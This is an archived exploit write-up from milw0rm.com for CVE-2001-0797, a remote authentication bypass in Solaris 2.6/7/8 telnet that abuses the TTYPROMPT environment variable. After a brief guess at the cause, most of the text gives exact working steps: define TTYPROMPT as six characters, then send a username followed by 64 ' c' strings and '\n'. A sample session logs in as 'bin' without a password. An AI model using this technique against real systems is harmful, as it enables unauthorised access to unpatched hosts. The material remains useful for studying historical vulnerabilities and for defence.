Solaris 2.6/7/8 - 'TTYPROMPT in.telnet' Remote Authentication Bypass - CVE-2001-0797

1. Solaris TTYPROMPT Security Vulnerability (Telnet)
2.  
3. This vulnerability is very simple to exploit, since it does not require
4. any code to be compiled by an attacker. The vulnerability only requires
5. the attacker to simply define the environment variable TTYPROMPT to a
6. 6-character string, inside telnet. Jonathan believes this overflows an
7. integer inside login, which specifies whether the user has been
8. authenticated (just a guess).
9.  
10. Once connected to the remote host, you must type the username, followed
11. by 64 " c"s, and a literal "\n". You will then be logged in as the user
12. without any password authentication. This should work with any account
13. except root (unless remote root login is allowed).
14.  
15. Example:
16. coma% telnet
17. telnet> environ define TTYPROMPT abcdef
18. telnet> o localhost
19.  
20. SunOS 5.8
21.  
22. bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
23. Last login: whenever
24. $ whoami bin
25.  
26. # milw0rm.com [2002-11-02]
27.